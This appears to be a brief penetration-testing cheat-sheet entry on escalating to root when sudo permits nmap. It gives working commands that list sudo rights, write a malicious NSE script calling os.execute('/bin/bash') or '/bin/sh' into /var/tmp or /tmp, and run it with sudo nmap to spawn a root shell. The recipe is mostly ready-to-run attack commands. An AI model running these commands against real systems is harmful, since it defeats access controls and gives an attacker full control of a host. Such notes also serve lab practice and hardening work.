Sudo nmap NSE Privesc
When sudo allows nmap
sudo -l
# (ALL) NOPASSWD: /usr/bin/nmap
Drop a malicious NSE script
echo "os.execute('/bin/bash')" >> /var/tmp/offsec.nse
cat /var/tmp/offsec.nse
sudo /usr/bin/nmap --script=/var/tmp/offsec.nse
Alternative one-liner:
echo "os.execute('/bin/sh')" > /tmp/root.nse
sudo nmap --script=/tmp/root.nse